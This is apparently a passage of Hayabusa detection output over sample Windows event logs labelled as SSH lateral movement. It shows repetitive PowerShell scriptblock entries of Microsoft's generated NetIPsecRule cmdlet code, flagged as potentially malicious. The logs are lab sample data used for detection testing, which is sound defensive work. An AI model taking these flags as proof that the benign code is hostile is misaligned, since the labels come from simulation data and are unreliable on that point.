($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 